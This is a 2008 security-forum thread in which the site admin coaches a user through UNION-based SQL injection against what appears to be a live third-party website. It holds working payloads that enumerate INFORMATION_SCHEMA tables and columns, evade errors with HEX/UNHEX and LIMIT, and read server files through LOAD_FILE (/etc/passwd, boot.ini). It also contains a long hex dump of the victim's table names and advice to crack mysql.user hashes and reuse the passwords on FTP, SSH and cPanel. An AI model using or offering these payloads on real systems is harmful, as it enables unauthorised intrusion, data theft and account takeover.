Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
September 18, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 231
Members: 0
Total: 231
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> All other security holes -> TABLE NAME sql injection exploit Goto page 1, 2  Next
Post new topic  Reply to topic View previous topic :: View next topic 
TABLE NAME sql injection exploit
PostPosted: Sat Jan 26, 2008 10:51 am Reply with quote
kr0k0
Advanced user
Advanced user
 
Joined: Jan 26, 2008
Posts: 128




Hi , i want to know how i can see all Table Name in exploit SQL injection


i put : from INFORMATION_SCHEMA.TABLES--

nO WOrk Confused ??

why ? and how ?
View user's profile Send private message Visit poster's website
Re: TABLE NAME sql injection exploit
PostPosted: Sat Jan 26, 2008 1:32 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




kr0k0 wrote:
Hi , i want to know how i can see all Table Name in exploit SQL injection


i put : from INFORMATION_SCHEMA.TABLES--

nO WOrk Confused ??

why ? and how ?


MySql version 5.x ??

Code:

UNION ALL SELECT 1,TABLE_NAME,3,4,5 FROM INFORMATION_SCHEMA.TABLES


Code:

UNION ALL SELECT 1,CONCAT(TABLE_NAME,0x2e,COLUMN_NAME),3,4,5 FROM INFORMATION_SCHEMA.COLUMNS
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Jan 26, 2008 4:48 pm Reply with quote
nox
Advanced user
Advanced user
 
Joined: Dec 29, 2007
Posts: 100
Location: c://windows/system32




in Other site , does not work , ?? Confused I do not know why ????


Last edited by nox on Sat Jan 26, 2008 4:55 pm; edited 2 times in total

_________________
..::::[ Waraxe.us is the BEST and the TOP ]::::..
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Sat Jan 26, 2008 4:51 pm Reply with quote
kr0k0
Advanced user
Advanced user
 
Joined: Jan 26, 2008
Posts: 128




Not w0rk Sad , whene i put :

Code:
.php?id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8%20FROM%20INFORMATION_SCHEMA.TABLES/*


you see :

8
4

le 01/01/1970, 5

but whene i put :

Code:
.php?id=-1%20UNION%20SELECT%201,2,3,TABLE_NAME,5,6,7,8%20FROM%20INFORMATION_SCHEMA.TABLES/*


Error Mysql ......

why ????? Rolling Eyes
View user's profile Send private message Visit poster's website
PostPosted: Sat Jan 26, 2008 5:22 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Try this tests:

Code:

php?id=-1%20UNION%20SELECT%201,2,3,@@version,5,6,7,8%20FROM%20INFORMATION_SCHEMA.TABLES/*


Code:

php?id=-1%20UNION%20SELECT%201,2,3,USER(),5,6,7,8%20FROM%20INFORMATION_SCHEMA.TABLES/*


Code:

php?id=-1%20UNION%20SELECT%201,2,3,DATABASE(),5,6,7,8%20FROM%20INFORMATION_SCHEMA.TABLES/*


Still sql errors?

This can be collation problem, it's very common in real-world attack scenarios. One possible solution:

Code:

php?id=-1%20UNION%20SELECT%201,2,3,HEX(TABLE_NAME),5,6,7,8%20FROM%20INFORMATION_SCHEMA.TABLES/*


One more possible error reason - multiple returned rows.

Try this:

Code:

php?id=-1%20UNION%20SELECT%201,2,3,TABLE_NAME,5,6,7,8%20FROM%20INFORMATION_SCHEMA.TABLES+LIMIT+1,1/*
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Jan 26, 2008 7:44 pm Reply with quote
kr0k0
Advanced user
Advanced user
 
Joined: Jan 26, 2008
Posts: 128




just 1 is work Cool

Code:
php?id=-1%20UNION%20SELECT%201,2,3,HEX(TABLE_NAME),5,6,7,8%20FROM%20INFORMATION_SCHEMA.TABLES/*



But it is in HEX code

Code:
8
4348415241435445525F53455453
le 01/01/1970, 5

8
434F4C4C4154494F4E53
le 01/01/1970, 5

8
434F4C4C4154494F4E5F4348415241435445525F5345545F4150504C49434142494C495459
le 01/01/1970, 5

8
434F4C554D4E53
le 01/01/1970, 5

8
434F4C554D4E5F50524956494C45474553
le 01/01/1970, 5

8
4B45595F434F4C554D4E5F5553414745
le 01/01/1970, 5

8
524F5554494E4553
le 01/01/1970, 5

8
534348454D415441
le 01/01/1970, 5

8
534348454D415F50524956494C45474553
le 01/01/1970, 5

8
53544154495354494353
le 01/01/1970, 5

8
5441424C4553
le 01/01/1970, 5

8
5441424C455F434F4E53545241494E5453
le 01/01/1970, 5

8
5441424C455F50524956494C45474553
le 01/01/1970, 5

8
5452494747455253
le 01/01/1970, 5

8
5649455753
le 01/01/1970, 5

8
555345525F50524956494C45474553
le 01/01/1970, 5

8
62616332303036
le 01/01/1970, 5

8
61646D696E
le 01/01/1970, 5

8
626F75727365
le 01/01/1970, 5

8
636C617373656D656E745F73706F72745F323030365F32303037
le 01/01/1970, 5

8
64617461747261636B6572
le 01/01/1970, 5

8
64617461747261636B65725F74657374
le 01/01/1970, 5

8
646576697365
le 01/01/1970, 5

8
6571756970655F323030365F32303037
le 01/01/1970, 5

8
696E666F5F626F75727365
le 01/01/1970, 5

8
696E666F5F63696E656D61
le 01/01/1970, 5

8
696E666F5F6D6574656F
le 01/01/1970, 5

8
696E666F5F6D7573697175655F617274
le 01/01/1970, 5

8
696E666F5F73696D706C65
le 01/01/1970, 5

8
69706175746F72697365
le 01/01/1970, 5

8
6A6F75726E616C
le 01/01/1970, 5

8
6A6F75726E616C5F6261636B7570
le 01/01/1970, 5

8
6A6F75726E6E65655F323030365F32303037
le 01/01/1970, 5

8
72656D6172717565
le 01/01/1970, 5

8
726573756C7461745F73706F72745F323030365F32303037
le 01/01/1970, 5

8
746175785F6368616E6765
le 01/01/1970, 5

8
7574696C69736174657572
le 01/01/1970, 5

8
636C617373656D656E745F73706F7274
le 01/01/1970, 5

8
657175697065
le 01/01/1970, 5

8
6A6F75726E6E6565
le 01/01/1970, 5

8
726573756C7461745F73706F7274
le 01/01/1970, 5

8
61637475616C697465
le 01/01/1970, 5

8
616E6E6565
le 01/01/1970, 5

8
626F757469717565
le 01/01/1970, 5

8
63617465676F7269655F61637475616C697465
le 01/01/1970, 5

8
636F6D6D756E697175655F707265737365
le 01/01/1970, 5

8
636F6E73756C746174696F6E
le 01/01/1970, 5

8
6465636C61726174696F6E5F706467
le 01/01/1970, 5

8
64657461696C5F61637475616C697465
le 01/01/1970, 5

8
646972696765616E74
le 01/01/1970, 5

8
646973636F75725F706467
le 01/01/1970, 5

8
646973747269627574657572
le 01/01/1970, 5

8
646F6C65616E6365
le 01/01/1970, 5

8
646F73736965725F707265737365
le 01/01/1970, 5

8
6573706163655F7075626C6963697461697265
le 01/01/1970, 5

8
67616C65726965
le 01/01/1970, 5

8
676C6F737361697265
le 01/01/1970, 5

8
6F666672655F6D6F62696C6973
le 01/01/1970, 5

8
6F666672655F6D6F62696C69735F73657276696365
le 01/01/1970, 5

8
6F70657261746575725F726F616D696E67
le 01/01/1970, 5

8
70617973
le 01/01/1970, 5

8
70686F746F5F67616C65726965
le 01/01/1970, 5

8
7265636861726765
le 01/01/1970, 5

8
726567696F6E
le 01/01/1970, 5

8
73657276696365
le 01/01/1970, 5

8
73657373696F6E73
le 01/01/1970, 5

8
7461726966735F696E7465726E6174696F6E616C
le 01/01/1970, 5

8
7461726966735F6E6174696F6E616C
le 01/01/1970, 5

8
7461726966735F726F616D696E675F656D697373696F6E
le 01/01/1970, 5

8
7461726966735F726F616D696E675F726563657074696F6E
le 01/01/1970, 5

8
7461726966735F726F616D696E675F736D735F656D697373696F6E
le 01/01/1970, 5

8
747970655F67616C65726965
le 01/01/1970, 5

8
7574696C6973617465757273
le 01/01/1970, 5

8
7A6F6E65
le 01/01/1970, 5

8
626C61677565
le 01/01/1970, 5

8
70726F76657262656A6F7572
le 01/01/1970, 5

8
636F6C756D6E735F70726976
le 01/01/1970, 5

8
6462
le 01/01/1970, 5

8
66756E63
le 01/01/1970, 5

8
68656C705F63617465676F7279
le 01/01/1970, 5

8
68656C705F6B6579776F7264
le 01/01/1970, 5

8
68656C705F72656C6174696F6E
le 01/01/1970, 5

8
68656C705F746F706963
le 01/01/1970, 5

8
686F7374
le 01/01/1970, 5

8
70726F63
le 01/01/1970, 5

8
70726F63735F70726976
le 01/01/1970, 5

8
7461626C65735F70726976
le 01/01/1970, 5

8
74696D655F7A6F6E65
le 01/01/1970, 5

8
74696D655F7A6F6E655F6C6561705F7365636F6E64
le 01/01/1970, 5

8
74696D655F7A6F6E655F6E616D65
le 01/01/1970, 5

8
74696D655F7A6F6E655F7472616E736974696F6E
le 01/01/1970, 5

8
74696D655F7A6F6E655F7472616E736974696F6E5F74797065
le 01/01/1970, 5

8
75736572
le 01/01/1970, 5

8
757365725F696E666F
le 01/01/1970, 5

8
61746D5F615F63617465676F7279
le 01/01/1970, 5

8
61746D5F615F636F6E666967
le 01/01/1970, 5

8
61746D5F615F66696C65
le 01/01/1970, 5

8
61746D5F615F6B6579776F7264
le 01/01/1970, 5

8
61746D5F615F6E6577736C6574746572
le 01/01/1970, 5

8
61746D5F615F70616765
le 01/01/1970, 5

8
61746D5F615F706172746E65725F6E616D65
le 01/01/1970, 5

8
61746D5F615F706172746E65725F75726C
le 01/01/1970, 5

8
61746D5F615F70726F7669646572
le 01/01/1970, 5

8
61746D5F615F7265736F6C7574696F6E
le 01/01/1970, 5

8
61746D5F615F7365617263685F656E67696E65
le 01/01/1970, 5

8
61746D5F615F73697465
le 01/01/1970, 5

8
61746D5F615F766172735F6E616D65
le 01/01/1970, 5

8
61746D5F615F766172735F76616C7565
le 01/01/1970, 5

8
61746D5F6172636869766573
le 01/01/1970, 5

8
61746D5F63617465676F7279
le 01/01/1970, 5

8
61746D5F67726F757073
le 01/01/1970, 5

8
61746D5F69705F69676E6F7265
le 01/01/1970, 5

8
61746D5F6C696E6B5F7670
le 01/01/1970, 5

8
61746D5F6C696E6B5F767076
le 01/01/1970, 5

8
61746D5F6E6577736C6574746572
le 01/01/1970, 5

8
61746D5F70616765
le 01/01/1970, 5

8
61746D5F706167655F6D643575726C
le 01/01/1970, 5

8
61746D5F706167655F75726C
le 01/01/1970, 5

8
61746D5F71756572795F6C6F67
le 01/01/1970, 5

8
61746D5F73697465
le 01/01/1970, 5

8
61746D5F736974655F706172746E6572
le 01/01/1970, 5

8
61746D5F736974655F706172746E65725F75726C
le 01/01/1970, 5

8
61746D5F736974655F75726C
le 01/01/1970, 5

8
61746D5F7573657273
le 01/01/1970, 5

8
61746D5F75736572735F6C696E6B5F67726F757073
le 01/01/1970, 5

8
61746D5F76617273
le 01/01/1970, 5

8
61746D5F76657273696F6E
le 01/01/1970, 5

8
61746D5F7669736974
le 01/01/1970, 5

8
636F6E737472756374657572
le 01/01/1970, 5

8
706F727461626C6573
le 01/01/1970, 5

8
616D6261737361646573
le 01/01/1970, 5

8
62656C6C65
le 01/01/1970, 5

8
636861696E655F7476
le 01/01/1970, 5

8
636F6D6D756E69717565735F707265737365
le 01/01/1970, 5

8
646F7561615F656C5F7961776D
le 01/01/1970, 5

8
686F72616972655F707269657265
le 01/01/1970, 5

8
686F726F73636F7065
le 01/01/1970, 5

8
6E6F7576656175746573
le 01/01/1970, 5

8
70726F6772616D6D657476
le 01/01/1970, 5

8
70726F76657262655F7468656D65
le 01/01/1970, 5

8
72656365747465
le 01/01/1970, 5

8
7468656D655F6369746174696F6E
le 01/01/1970, 5
View user's profile Send private message Visit poster's website
PostPosted: Sat Jan 26, 2008 7:48 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Try this:

Code:

php?id=-1%20UNION%20SELECT%201,2,3,UNHEX(HEX(TABLE_NAME)),5,6,7,8%20FROM%20INFORMATION_SCHEMA.TABLES/*
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Jan 26, 2008 7:58 pm Reply with quote
kr0k0
Advanced user
Advanced user
 
Joined: Jan 26, 2008
Posts: 128




THankx working 1000% Laughing Cool Shocked

u are the Top waraxe , u are a Cracker Razz
View user's profile Send private message Visit poster's website
PostPosted: Sat Jan 26, 2008 8:00 pm Reply with quote
kr0k0
Advanced user
Advanced user
 
Joined: Jan 26, 2008
Posts: 128




Bro , how i can see table admin ??

mysql.admin/*

INFORMATION_SCHEMA.admin/*


not work ?

and thankx
View user's profile Send private message Visit poster's website
PostPosted: Sat Jan 26, 2008 8:35 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




kr0k0 wrote:
Bro , how i can see table admin ??

mysql.admin/*

INFORMATION_SCHEMA.admin/*


not work ?

and thankx


There is mysql.user table, but it seems, that you have no access privileges to it.
INFROMATION_SCHEMA enumerates all tables in all databases, available to currently logged-in user. If there is no "user" table (from mysql.user), then no access to mysql database. Most of the real-world sql injections are not capable of accessing mysql.user, because server/database admins will not easily give out such privileges. Still, there is lot's of .EDU, .ORG and other low-security servers, where sql injection will give you mysql root privileges. Lazy admins ...
So in this case FILE privileges is no problem, you can read and write local files and try to get php or shell access level. And of course mysql.user will be available in this case. You can fetch mysql usernames and password hashes, crack hashes with Cain and then try them as ftp/ssh/Cpanel/DirectAdmin/etc credentials. People tend to be lazy and use same passwords for many accounts ... Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Jan 27, 2008 6:14 am Reply with quote
kr0k0
Advanced user
Advanced user
 
Joined: Jan 26, 2008
Posts: 128




thankx for info waraxe ,

how i put CONCAT in this :

beetween this :
Code:
.php?id=-1%20UNION%20SELECT%201,2,3,UNHEX(HEX(table_name)),5,6,7,8%20FROM%20INFORMATION_SCHEMA.TABLES/*


and this :

Code:
.php=-1%20UNION%20SELECT%201,2,3,UNHEX(HEX(column_name)),5,6,7,8%20FROM%20INFORMATION_SCHEMA.columns/*


and thankx Waraxe Wink
View user's profile Send private message Visit poster's website
PostPosted: Sun Jan 27, 2008 1:08 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Something like this maybe:

Code:

.php=-1%20UNION%20SELECT%201,2,3,UNHEX(HEX(CONCAT(TABLE_NAME,0x2e,COLUMN_NAME))),5,6,7,8%20FROM%20INFORMATION_SCHEMA.COLUMNS/*
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Jan 28, 2008 11:12 am Reply with quote
kr0k0
Advanced user
Advanced user
 
Joined: Jan 26, 2008
Posts: 128




hmhmh Cool

bro whene i put :

Code:
php?id=-1%20UNION%20SELECT%201,2,3,LOAD_FILE('/'),5,6,7,8/**/from/**/mysql.user/*


8

le 01/01/1970, 5


whene i put :

Code:
php?id=-1%20UNION%20SELECT%201,2,3,LOAD_FILE('/etc/passwd'),5,6,7,8/**/from/**/mysql.user/*



[color=red]Error Mysql


__________________

i find all Tables DB

Code:
admin
user
tables
etc...


whene i Go to 'user'

Code:
php?id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8/**/from/**/mysql.user/*


find :

Code:
8
4
le 01/01/1970, 5


but whene i go to admin Confused look :

Code:
php?id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8/**/from/**/mysql.admin/*


Code:
php?id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8+INFORMATION_SCHEMA.admin/*


Code:
php?id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8+FROM+admin/*


ERROR MYSQL DB ...

Help ? Rolling Eyes

to read etc/passwd , and go to admin [ by HEX ]
thankx Waraxe Cool
View user's profile Send private message Visit poster's website
PostPosted: Mon Jan 28, 2008 10:15 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




1. Because in most servers "magic_quotes=on", then you must use hex-encoded strings as argument for LOAD_FILE().

Example: LOAD_FILE(0x633A5C626F6F742E696E69) for boot.ini in windows server.

More useful info here:

http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

2. There is no such thing as "mysql.admin" nor "INFORMATION_SCHEMA.admin" ...
I suggest to install apache/php/mysql/phpmyadmin to your home PC and then use phpmyadmin and take a good look @ mysql and information_schema databases! All database users are in mysql.user ...

And of course - you must understand, that there is difference between database user and web application user (for example phpbb forum user or admin).
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue Jan 29, 2008 6:08 am Reply with quote
kr0k0
Advanced user
Advanced user
 
Joined: Jan 26, 2008
Posts: 128




Error Mysql ... Sad
View user's profile Send private message Visit poster's website
TABLE NAME sql injection exploit
  www.waraxe.us Forum Index -> All other security holes
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 2  
Goto page 1, 2  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






It book reviews
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.095 Seconds